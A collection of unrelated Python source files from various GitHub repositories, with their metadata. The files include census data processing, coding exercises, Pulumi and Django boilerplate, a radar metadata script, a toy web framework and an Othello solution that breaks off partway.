Python
| false
| false
| 5,797
|
py
|
"""
"""
import logging
from functools import reduce
from itertools import chain
from pathlib import Path
from auto_tqdm import tqdm
import metapack as mp
import pandas as pd
from demosearch import FileCache
logger = logging.getLogger(__name__)
class LPError(Exception):
pass
aggregates = {
'male_u18': ['b01001_003', 'b01001_004', 'b01001_005', 'b01001_006'],
'female_u18': ['b01001_027', 'b01001_028', 'b01001_029', 'b01001_030'],
'male_18_40': ['b01001_007', 'b01001_008', 'b01001_009', 'b01001_010', 'b01001_011', 'b01001_012', 'b01001_013'],
'female_18_40': ['b01001_031', 'b01001_032', 'b01001_033', 'b01001_034', 'b01001_035', 'b01001_036', 'b01001_037'],
'senior': ['b01001_020', 'b01001_021', 'b01001_022', 'b01001_023', 'b01001_024', 'b01001_025',
'b01001_044', 'b01001_045', 'b01001_046', 'b01001_047', 'b01001_048', 'b01001_049'],
}
def get_columns(pkg):
"""Get the columns from the existing schema"""
pkg = mp.open_package(pkg.ref) # Re-open in case it has changed since loaded in this notebook
return [e['name'] for e in pkg.resource('census_set').columns()]
def munge(v):
return v.title() \
.replace('Partner Households By Sex Of Partner - Households - Total -', '') \
.replace('Total Population - Total - ', '') \
.replace(' Total Population - Total', 'Total Population') \
.replace(' - ', ', ')[11:].strip()
def col_f(v):
return not v[0].endswith('_m90') and not v[0] in ('geoid', 'stusab', 'county', 'name')
class ExtractManager(object):
def __init__(self, pkg, cache=None):
self.pkg = pkg
self.pkg_root = Path(self.pkg.path).parent
self._df = None
self._agg_map = None
if cache is None:
self._cache = FileCache(self.pkg_root.joinpath('data', 'cache'))
else:
self._cache = cache
@property
def table_code_map(self):
"Map from census table codes to friendlier names"
return {c.props.get('tablecode'): c.name for c in
self.pkg.resource('census_set').schema_term.find('Table.Column')
if c.props.get('tablecode')}
@property
def agg_map(self):
if self._agg_map is None:
_ = self.census_set # Also creates the agg_map
return self._agg_map
def update_schema(self):
pkg = mp.open_package(self.pkg.ref) # Re-open in case it has changed since loaded in this notebook
for c in pkg.resource('combined').schema_term.find('Table.Column'):
if not c.description:
c.description = self.column_map.get(c.name.upper())
pkg.write()
@property
def column_map(self):
# Gets created in base_census_df
return self._cache.get('base_census_df_cm')
@property
def base_census_df(self):
k = 'base_census_df'
kcm = 'base_census_df_cm'
if not self._cache.exists(k) or not self._cache.exists(kcm):
logger.info('Collect frames')
frames = [r.dataframe().drop(columns=['stusab', 'county', 'name'])
for r in tqdm(self.pkg.references()) if r.name.startswith('B')]
# Need to do this here b/c we need the CensusDataFrame objects
kv = list(filter(col_f, chain(*[list(e for e in e.title_map.items()) for e in frames])))
column_map = {k: munge(v) for k, v in kv}
logger.info('Assemble frames into dataset')
df = reduce(lambda left, right: left.join(right), frames[1:], frames[0])
self._cache.put_df(k, df)
self._cache.put(kcm, column_map)
return df
else:
return self._cache.get(k)
@property
def census_set(self):
if self._df is None:
df = self.base_census_df
# get rid of the margin columns
m90_col = [c for c in df.columns if c.endswith('m90')]
df = df.drop(columns=m90_col)
logger.info('Make aggregate map')
rows = []
for acol, scols in aggregates.items():
df[acol] = df.loc[:, scols].sum(axis=1)
for c in scols:
rows.append((acol, c, self.column_map[c.upper()]))
self._agg_map = pd.DataFrame(rows, columns=['agg_column', 'source_col', 'description'])
df = df.reset_index()
iq = self.pkg.reference('income_quartiles').dataframe()
df = df.merge(iq.set_index('geoid'), on='geoid').fillna(0)
agg = self.pkg.reference('aggregate_income').dataframe().drop(columns=['households'])
df = df.merge(agg.set_index('geoid'), on='geoid').fillna(0)
# Rename non-agregated columns to nicer names
df = df.rename(columns=self.table_code_map)
cols = get_columns(self.pkg) # Select only the columns described in the schema
self._df = df.replace({'':0}).fillna(0)[cols]
return self._df
outputs = ('census_set', 'agg_map')
def build(self, force=False, clean=False):
dd = self.pkg_root.joinpath('data')
if clean:
self._cache.clean()
if not dd.exists():
dd.mkdir(parents=True, exist_ok=True)
for o in self.outputs:
p = dd.joinpath(o).with_suffix('.csv')
if not p.exists() or force:
logger.info(f"Creating {o}{' (forcing)' if force else ''}")
d = getattr(self, o)
logger.info(f"Write {o}")
d.to_csv(p, index=False)
else:
logger.info(f"{o} already exists")
# update_schema(pkg)
|
[
"eric@civicknowledge.com"
] |
eric@civicknowledge.com
|
fda25cd04a77bf1bfc47c634a5515d90cae9a5a2
|
e6e0e108758213a96e73e836f032f27dc69c9fee
|
/leetcode/isomorphic_strings.py
|
9bbfb794daaf54b284204b1e608626d91804b8fa
|
[] |
no_license
|
kristogj/alg_dat
|
1a41e70b8b169c79eb05c5e5f44f5de0e50bd9b9
|
7865bcce0f2aa858ff4329301b788fac5de2cd08
|
refs/heads/master
| 2020-03-30T05:26:36.536544
| 2018-10-06T22:06:45
| 2018-10-06T22:06:45
| 150,799,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
class Solution(object):
def isIsomorphic(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
if len(s) != len(t):
return False
m,n = {},{}
for x in range(len(s)):
if s[x] in m.keys():
if m[s[x]] != t[x]:
return False
elif t[x] in n.keys():
if n[t[x]] != s[x]:
return False
else:
m[s[x]] = t[x]
n[t[x]] = s[x]
return True
def isIsomorphic_easier(self,s,t):
return len(set(zip(s,t))) == len(set(s)) == len(set(t))
s = Solution()
print(s.isIsomorphic("ab","aa"))
print(s.isIsomorphic_easier("ab","aa"))
|
[
"kristoffergjerde@gmail.com"
] |
kristoffergjerde@gmail.com
|
ab4c4b4bd0a3ccc555139b5410e85394b27166d0
|
2825bf6479e08dfead428ff9f29f28d5c23d953e
|
/25_2/25_6.py
|
16ee0a2a14b274729d3136e9a7323e8b35aeabb8
|
[] |
no_license
|
zedaster/ImaevIntensive
|
bc459187dace7946d8ad75a04e058748134aeac4
|
b91760fa23f25ce2d19778781f35416c177ab881
|
refs/heads/main
| 2023-06-22T00:24:47.039208
| 2021-07-20T10:40:54
| 2021-07-20T10:40:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
# for n in range(400_000_000, 600_000_000+1):
# x = n
# while x % 4 == 0:
# x //= 4
# while x % 9 == 0:
# x //= 9
# if x == 3:
# print(n, end=' ')
for m in range(2, 31, 2):
for n in range(1, 20, 2):
number = (2**m) * (3**n)
if 400_000_000 <= number <= 600_000_000:
print(number)
|
[
"serzh.kazantseff@gmail.com"
] |
serzh.kazantseff@gmail.com
|
d7b3582b4c52e7fb88539c13be1c092caeaff812
|
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
|
/sdk/python/pulumi_azure_native/mixedreality/_inputs.py
|
e3ee76ba7c0e562f01879921a0d3d73612de3188
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
MisinformedDNA/pulumi-azure-native
|
9cbd75306e9c8f92abc25be3f73c113cb93865e9
|
de974fd984f7e98649951dbe80b4fc0603d03356
|
refs/heads/master
| 2023-03-24T22:02:03.842935
| 2021-03-08T21:16:19
| 2021-03-08T21:16:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,326
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from ._enums import *
__all__ = [
'IdentityArgs',
'ObjectAnchorsAccountIdentityArgs',
'SkuArgs',
]
@pulumi.input_type
class IdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
Identity for the resource.
:param pulumi.Input['ResourceIdentityType'] type: The identity type.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The identity type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ObjectAnchorsAccountIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
:param pulumi.Input['ResourceIdentityType'] type: The identity type.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The identity type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
capacity: Optional[pulumi.Input[int]] = None,
family: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input['SkuTier']] = None):
"""
The resource model definition representing SKU
:param pulumi.Input[str] name: The name of the SKU. Ex - P3. It is typically a letter+number code
:param pulumi.Input[int] capacity: If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
:param pulumi.Input[str] family: If the service has different generations of hardware, for the same SKU, then that can be captured here.
:param pulumi.Input[str] size: The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
:param pulumi.Input['SkuTier'] tier: This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
"""
pulumi.set(__self__, "name", name)
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if family is not None:
pulumi.set(__self__, "family", family)
if size is not None:
pulumi.set(__self__, "size", size)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the SKU. Ex - P3. It is typically a letter+number code
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
"""
If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def family(self) -> Optional[pulumi.Input[str]]:
"""
If the service has different generations of hardware, for the same SKU, then that can be captured here.
"""
return pulumi.get(self, "family")
@family.setter
def family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "family", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input['SkuTier']]:
"""
This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input['SkuTier']]):
pulumi.set(self, "tier", value)
|
[
"noreply@github.com"
] |
MisinformedDNA.noreply@github.com
|
ce92586470483837f6477b0a75a40dce98aa8f9a
|
a652f89c88fcecb3aa665cf20212064049e9a16f
|
/models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence/ai_elective_questions.py
|
c7a2b24914c91838a6347b4bcede3ccf62a582a8
|
[] |
no_license
|
princelewis/Elective-Course-Recommender-System
|
cba3743d914a664145fda3ae060f4cf80bdfbbed
|
9e5f165878f7521ce8967c72daa8b538252d0ae8
|
refs/heads/master
| 2020-05-19T08:19:39.793382
| 2019-03-29T11:50:00
| 2019-03-29T11:50:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,679
|
py
|
# Importing required modules
import pandas as pd
from models.aos_questions_and_answer.dataset.elective_courses_questions.artificial_intelligence \
.procesing_ai_elective_courses import \
Util
# Initializing variables
ai_correct = 0
ai_failed = 0
se_correct = 0
se_failed = 0
cn_correct = 0
cn_failed = 0
sye_correct = 0
sye_failed = 0
tc_correct = 0
tc_failed = 0
AI = []
SE = []
CN = []
SYE = []
TC = []
final_scores = []
current_question_number = 0
ai_total_questions = 0
# Reading the CSV file that contains all compiled questions with respective answers
# models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence
# /ai_elective_courses_questions.csv
dataset = pd.read_csv(
'models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence'
'/ai_elective_courses_questions.csv')
# COS833
cos_833_questions = dataset.iloc[1:, :1].values
cos_833_answers = dataset.iloc[1:, 1].values
cos_833_list_of_dictionaries_of_questions_and_answers = Util.processed_list_dict(cos_833_questions, cos_833_answers)
cos_833_selected_six_random = Util.select_six_random(cos_833_list_of_dictionaries_of_questions_and_answers)
# COS816
cos_816_questions = dataset.iloc[1:, 2:3].values
cos_816_answers = dataset.iloc[1:, 3].values
cos_816_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_816_questions, cos_816_answers)
cos_816_selected_six_random = Util.select_six_random(cos_816_list_of_dictionaries_of_questions_and_answers)
# COS830
cos_830_questions = dataset.iloc[1:, 4:5].values
cos_830_answers = dataset.iloc[1:, 5].values
cos_830_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_830_questions, cos_830_answers)
cos_830_selected_six_random = Util.select_six_random(cos_830_list_of_dictionaries_of_questions_and_answers)
# COS836
cos_836_questions = dataset.iloc[1:, 6:7].values
cos_836_answers = dataset.iloc[1:, 7].values
cos_836_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_836_questions, cos_836_answers)
cos_836_selected_six_random = Util.select_six_random(cos_836_list_of_dictionaries_of_questions_and_answers)
# COS834
cos_838_questions = dataset.iloc[1:, 8:9].values
cos_838_answers = dataset.iloc[1:, 9].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_834_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)
# COS838
cos_838_questions = dataset.iloc[1:, 10:11].values
cos_838_answers = dataset.iloc[1:, 11].values
cos_838_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_838_questions, cos_838_answers)
cos_838_selected_six_random = Util.select_six_random(cos_838_list_of_dictionaries_of_questions_and_answers)
# Getting total questions and answers to be asked for ever user
ai_total_questions_and_answer = Util.all_selected_questions_with_answers(cos_833_selected_six_random,
cos_816_selected_six_random,
cos_830_selected_six_random,
cos_836_selected_six_random,
cos_834_selected_six_random,
cos_838_selected_six_random)
# print(total_questions_and_answer)
for i in ai_total_questions_and_answer.values():
for j in i:
ai_total_questions += 1
|
[
"emmaldini12@gmail.com"
] |
emmaldini12@gmail.com
|
9d449527cdaa26e79a17950d62dcc6a2bdc7d18c
|
34f1b1fc2fbca6b61858a83cbdf498fe99648209
|
/scripts/create_metadata.py
|
7da66e6aad7430fd22dfd617cee183a90212288c
|
[
"Apache-2.0"
] |
permissive
|
firth/radcomp
|
88a97b2918b3e0683d181085d10e3f8a78549e93
|
a855a66189b1d7867a6c373d3fdc6ce67f6d3c01
|
refs/heads/master
| 2020-12-25T02:25:32.772407
| 2020-10-07T02:43:18
| 2020-10-07T02:43:18
| 41,178,899
| 0
| 0
| null | 2020-10-07T02:43:19
| 2015-08-21T21:49:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,840
|
py
|
""" Create the auxillary JSON metadata that goes with this production
{"meta": {"vcp": 212, "product": "N0Q", "valid": "2014-06-25T20:43:55Z",
"site": "DMX"}}
This magic requires that some modifications were done to nex2img to get this
information included in the GEMPAK log file
--- a/gempak/source/programs/upc/programs/nex2img/nex2img.f
+++ b/gempak/source/programs/upc/programs/nex2img/nex2img.f
@@ -221,7 +221,7 @@ C
IF (ierf.eq.0) THEN
viewable = .true.
ifile = 1
-
+ write(*, *) 'Searching radar: ', stid
CALL ST_RPST(tpath,'%SITE%',stid,ipos,
+ outstr, ier)
CALL ST_RPST(outstr,'%PROD%',gfunc,ipos,
@@ -256,6 +256,7 @@ C
radproj = 'RAD|D'
radarea = 'dset'
idrpfl = 0
+ write(*, *) 'Using image: ', imgfls
CALL GG_MAPS ( radproj, radarea, imgfls,
+ idrpfl, ier )
C
"""
import json
import sys
import os
import datetime
import tempfile
import subprocess
def main():
"""Go Main Go."""
sector = sys.argv[1]
ts = datetime.datetime(
int(sys.argv[2]),
int(sys.argv[3]),
int(sys.argv[4]),
int(sys.argv[5]),
int(sys.argv[6]),
)
utcnow = datetime.datetime.utcnow()
seconds = (utcnow - ts).days * 86400.0 + (utcnow - ts).seconds
if seconds > 300:
sys.exit()
prod = sys.argv[7]
job = sys.argv[9]
starttime = datetime.datetime.strptime(sys.argv[8], "%Y%m%d%H%M%S")
utcnow = datetime.datetime.utcnow()
radars = 0
used = 0
logfn = "logs/nex2img_%s_%s_%s.log" % (sector, prod, job)
if os.path.isfile(logfn):
for line in open(logfn):
if line.find("Searching radar:") > 0:
radars += 1
elif line.find("Using image:") > 0:
used += 1
else:
print(f"create_metadata log file {logfn} missing")
res = {
"meta": {
"vcp": None,
"product": prod,
"site": "%sCOMP" % (sector,),
"valid": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
"processing_time_secs": (utcnow - starttime).seconds,
"radar_quorum": "%s/%s" % (used, radars),
}
}
(tmpfp, tmpfn) = tempfile.mkstemp()
os.write(tmpfp, json.dumps(res).encode("utf-8"))
os.close(tmpfp)
cmd = (
"pqinsert -p 'gis r %s gis/images/4326/%sCOMP/%s_ bogus json' %s"
) % (ts.strftime("%Y%m%d%H%M"), sector, prod.lower(), tmpfn)
subprocess.call(cmd, shell=True)
os.unlink(tmpfn)
if __name__ == "__main__":
main()
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
5272cd23752277cc1560b83a7879696d5c876c27
|
f7aac490b6bdda8a49a6d14534ef733e2cd34bcc
|
/Code for 1.10.2018/drawCircleXYMove-wrap.py
|
c3af761110a39aa3ca365c1e84745d4026d2937b
|
[] |
no_license
|
nmessa/Stratham-Girls-Coding-Club
|
67c203fa88f62f2603b62a0d0fd50135a03f69dc
|
1bc786b6c794cc3159ed72be25130f9452fb23f6
|
refs/heads/master
| 2021-05-06T18:01:14.349667
| 2019-03-12T15:26:57
| 2019-03-12T15:26:57
| 111,935,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 760
|
py
|
## Draw Circle
## Author: nmessa
## Draws a circle moving in X and Y direction
## wraps around when it gets to the edge of the screen
from graphics import *
import time
def main():
height = 640
width = 640
radius = 50
#Create a windows to draw in
win = GraphWin('Circle Move XY with wraparound', width, height)
win.setBackground('white')
#Define a circle to draw
shape = Circle(Point(0, 0), radius)
#set the drawing parameters
shape.setOutline("red")
shape.setFill("green")
shape.setWidth(10)
#draw the circle in the window
shape.draw(win)
dx = 10
dy = 10
while True:
#Add code here
time.sleep(3)
win.close()
main()
|
[
"noreply@github.com"
] |
nmessa.noreply@github.com
|
198e9d1ccf06652376cec667659e83c694b12771
|
3d1ee3ddb516f0b499f6272fbc7fbd6eefb88a63
|
/jpackages/oss/1.0/actions/process.configure.py
|
a26799fc2992b053ec26cda45d6f47eafac6c365
|
[] |
no_license
|
despiegk/jp_serverapps
|
e72005004273db9dc01d1e64ddfcb28d06137f1f
|
82ecc0b56ac85b2fb2d1eb02a80ab4ac99026f47
|
refs/heads/master
| 2016-09-06T16:06:39.529847
| 2014-08-17T10:17:03
| 2014-08-17T10:17:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
def main(j,jp):
pass
#configure the application to autostart
# jp.log("set autostart $(jp.name)")
#numprocesses: if more than 1 process, will be started in tmux as $name_$nr
#ports: tcpports
#autostart: does this app start auto
#stopcmd: if special command to stop
#check: check app to see if its running
#stats: gather statistics by process manager
#timeoutcheck: how long do we wait to see if app active
#isJSapp: to tell system if process will self register to redis (is jumpscale app)
# pd=j.tools.startupmanager.addProcess(\
# name=jp.name,\
# cmd="python", \
# args="portal_start.py",\
# env={},\
# numprocesses=1,\
# priority=100,\
# shell=False,\
# workingdir='$base/apps/oss',\
# jpackage=jp,\
# domain="solutions",\
# ports=[82],\
# autostart=True,\
# reload_signal=0,\
# user="root",\
# log=True,\
# stopcmd=None,\
# check=True,\
# timeoutcheck=10,\
# isJSapp=1,\
# upstart=False,\
# stats=False,\
# processfilterstr="")#what to look for when doing ps ax to find the process
# pd.start()
|
[
"kristof@incubaid.com"
] |
kristof@incubaid.com
|
af35d9e3ecf3fb8d84581752c65f3cf3e9dc1c7d
|
237db09490a4fc5976e6f8a8eb783b928bde1cac
|
/lib/exabgp/version.py
|
3ea942e734182c2966ab29fa48eb5abce8e67786
|
[] |
no_license
|
brijohn/exabgp
|
c80a348035ff104b8d9e9c44ae07f97bf8e33728
|
788bde2842f2c2bc22580d0641003f2e93ff56ac
|
refs/heads/master
| 2020-12-25T17:56:51.444190
| 2017-05-30T16:14:59
| 2017-05-30T16:14:59
| 65,487,232
| 0
| 0
| null | 2016-08-11T17:11:12
| 2016-08-11T17:11:12
| null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
import os
release = "4.0.0-0478a014"
json = "4.0.0"
text = "4.0.0"
version = os.environ.get('EXABGP_VERSION',release)
# Do not change the first line as it is parsed by scripts
if __name__ == '__main__':
import sys
sys.stdout.write(version)
|
[
"thomas.mangin@exa-networks.co.uk"
] |
thomas.mangin@exa-networks.co.uk
|
c204c0ca912de6b8876285198e54ba6d72afbf93
|
eb93b37c5a76ef09c967ecfd32dc77f0a0e75bef
|
/article/migrations/0003_auto_20190712_1558.py
|
081657f7d7bbbd5e642424535d10296f6309e9ec
|
[] |
no_license
|
uktrade/data-hub-helpcentre
|
9a58d466b264ccdaafea12576039dcf8f2c19015
|
74f741345df3b35164f6d4c1f17bc56c709a4662
|
refs/heads/master
| 2023-08-16T22:36:14.704989
| 2023-08-15T08:58:10
| 2023-08-15T08:58:10
| 199,607,056
| 4
| 2
| null | 2023-08-15T08:58:12
| 2019-07-30T08:15:54
|
CSS
|
UTF-8
|
Python
| false
| false
| 696
|
py
|
# Generated by Django 2.2.3 on 2019-07-12 15:58
import wagtail.blocks
import wagtail.fields
import wagtail.images.blocks
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("article", "0002_auto_20190712_1537"),
]
operations = [
migrations.AlterField(
model_name="articlepage",
name="body",
field=wagtail.fields.StreamField(
[
("paragraph", wagtail.blocks.RichTextBlock()),
("image", wagtail.images.blocks.ImageChooserBlock()),
],
blank=True,
null=True,
),
),
]
|
[
"noreply@github.com"
] |
uktrade.noreply@github.com
|
73f2c0dde7fa284795d91a91d76bba4c78ef7a6f
|
4b801b5aafac91dd71b9dc3f9a247efe98dc13f0
|
/week3/serializer.py
|
d455db1ad93ca9f2f7b190f82c2ae1c108b7b58f
|
[
"MIT"
] |
permissive
|
Langat05/Awards
|
19f6a627861b7e54ebef705d804e121957185baa
|
df8f3f9ca1b7cbae1d88f3a3531a02a81b82186d
|
refs/heads/master
| 2023-01-05T20:20:58.369698
| 2020-10-27T14:05:55
| 2020-10-27T14:05:55
| 306,889,072
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
from rest_framework import serializers
from .models import *
class ProjectSerializer(serializers.ModelSerializer):
class Meta:
model = Projects
fields = ['title', 'description', 'image', 'author', 'created_date', 'author_profile', 'link']
class ProfileSerializer(serializers.ModelSerializer):
class Meta:
model = Profile
fields = ['user', 'image', 'bio']
|
[
"justuslangat78@gmail.com"
] |
justuslangat78@gmail.com
|
b2b28a96fe3b8e65d34f0ef57de0e797013b889c
|
b873ea1def0810f67834bf4926901b9a8fead362
|
/tuples_and_sets_09_21/students_grades.py
|
2d987e90a25cbc6088cc5ead764ea9d1a0c51cd1
|
[] |
no_license
|
NikiDimov/SoftUni-Python-Advanced
|
20f822614fa0fa7de6ded3956fa8d40d589a4a86
|
d6c1fe886a3c27c82f03e5e4a6c670f0905d54e6
|
refs/heads/main
| 2023-08-23T17:42:32.063057
| 2021-10-25T10:32:03
| 2021-10-25T10:32:03
| 328,750,268
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
N = int(input())
dict_of_students = {}
for _ in range(N):
student, grade = input().split()
grade = float(grade)
if student not in dict_of_students:
dict_of_students[student] = []
dict_of_students[student].append(grade)
for key, value in dict_of_students.items():
print(f"{key} -> {' '.join([f'{el:.2f}'for el in value])} (avg: {sum(value)/len(value):.2f})")
|
[
"niki.dimov86@gmail.com"
] |
niki.dimov86@gmail.com
|
6735465791531aeeabc1ba1331fb80c55ae2c8f7
|
cd4676555fc1066b5a84320ebbb1d4623066380d
|
/crusoe_observe/flowmon-rest-client/flowmonclient/resources/ads/Filters.py
|
3bb92373672eb9ac13be90dde634a9a6f25fedd0
|
[
"MIT"
] |
permissive
|
wumingruiye/CRUSOE
|
3ca542fa5362caf404593acfc4b01eb8f9b4d5f4
|
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
|
refs/heads/main
| 2023-07-01T21:40:09.538245
| 2021-08-05T14:07:03
| 2021-08-05T14:07:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
class Filters:
def __init__(self, client):
self.client = client
def all(self):
resource = "/filters"
return self.client.get(resource)
|
[
"spaceks@ics.muni.cz"
] |
spaceks@ics.muni.cz
|
d6e677ac1447f8278ddff36b140132e55441832c
|
4abd8812b5e13906ef5b93397548e71655e7fde3
|
/WebFrame.py
|
3c049b2484390aba2807bb3f2fef1e7be2b6f50d
|
[] |
no_license
|
HMmelody/AID1808
|
6b06f09308c7b3ba7cb80367d4b4a2568bf93691
|
c8893e45f5496a5fbcdd1db43f88b0df53290e52
|
refs/heads/master
| 2020-04-04T18:17:20.444824
| 2018-11-06T03:55:22
| 2018-11-06T03:55:22
| 156,157,644
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,817
|
py
|
# coding=utf-8
'''
模拟框架程序部分
'''
from socket import *
from views import *
frame_ip = '127.0.0.1'
frame_port = 8080
frame_address = (frame_ip,frame_port)
# 静态网页位置
STATIC_DIR = './static'
# url决定我们能处理什么数据
urls = [('/time',show_time),('/hello',say_hello),('/bye',say_bye)]
# 应用类,将功能封装在类中
class Application(object):
def __init__(self):
self.sockfd = socket()
self.sockfd.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
self.sockfd.bind(frame_address)
def start(self):
self.sockfd.listen(5)
print("Listen the port 8080")
while True:
connfd,addr = self.sockfd.accept()
method = connfd.recv(128).decode()
path_info = connfd.recv(1024).decode()
self.handle(connfd,method,path_info)
def handle(self,connfd,method,path_info):
if method == 'GET':
if path_info == '/' or path_info[-5:] == '.html':
response = self.get_html(path_info)
else:
response = self.get_data(path_info)
elif method == 'POST':
pass
connfd.send(response.encode())
connfd.close()
def get_html(self,path_info):
if path_info == '/':
get_file = STATIC_DIR + '/index.html'
else:
get_file = STATIC_DIR + path_info
try:
fd = open(get_file)
except IOError:
response = "404"
else:
response = fd.read()
finally:
return response
def get_data(self,path_info):
for url,func in urls:
if path_info == url:
return func()
return '404'
if __name__=='__main__':
app = Application()
app.start() # 启动框架应用程序
|
[
"tarena@tedu.cn"
] |
tarena@tedu.cn
|
3fb2b2cb9ec1a2718bd91fb9ee318afc55f997c6
|
51d46cf862654d30f5fa0ee35a9243c9661fc0eb
|
/User_/user_custom/user_custom/wsgi.py
|
c4912256bea59c34b54c8253916ca4ef2ffa19cc
|
[] |
no_license
|
LikeLionCBNU/HamDongHo
|
6762a8db487ae2807d1ce9d4d2df7e18d67eab70
|
082cea62cf4b5136309cbddc8c09e4e84f25de7c
|
refs/heads/master
| 2022-12-06T22:48:17.500207
| 2020-08-19T14:31:32
| 2020-08-19T14:31:32
| 256,194,835
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
"""
WSGI config for user_custom project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'user_custom.settings')
application = get_wsgi_application()
|
[
"ii8858@naver.com"
] |
ii8858@naver.com
|
f98ec6b74f00596af6fcf03d9e58cc0dd42de5a5
|
296756045df29db632141dda85034fca35213c92
|
/D3_4615_재미있는오셸로게임.py
|
23a924a8a5dd7ae3b09b95e5d7b3b37e34338aa0
|
[] |
no_license
|
dabini/SWEA
|
8b1b321a2126a41f0786e7212eb81ea0204716b6
|
4b61d34a4b089699a5594b4c43781a6f1dd2235e
|
refs/heads/master
| 2022-12-24T02:36:01.169672
| 2020-09-27T11:56:13
| 2020-09-27T11:56:13
| 236,012,382
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
T = int(input())
for t in range(T):
N, M = map(int, input().split()) # 보드의 한 변의 길이 N과 플레이어가 돌을 놓는 횟수 M
field = [[0]*(N+1) for _ in range(N+1)]
for j in range(N//2, N//2+2): #기본 설정
for i in range(N//2, N//2+2):
if i == j: #색이 1이면 흑돌, 2이면 백돌
field[j][i] = 2
else:
field[j][i] = 1
dx = [1, -1, 0, 0, 1, -1, 1, -1] #대각선까지 포함
dy = [0, 0, 1, -1, 1, -1, -1, 1]
for m in range(M):
X, Y, color = map(int, input().split())
field[Y][X] = color
for d in range(8):
check = True
for k in range(1, N):
if 1 <= Y+(dy[d]*k) < N+1 and 1<=X+(dx[d]*k)< N+1 and field[Y+(dy[d]*k)][X+(dx[d]*k)] == color:
for f in range(1, k):
if field[Y+dy[d]*f][X+dx[d]*f] == 0:
check = False
break
if check == False:
break
if check:
for f in range(1, k):
field[Y+dy[d]*f][X+dx[d]*f] = color
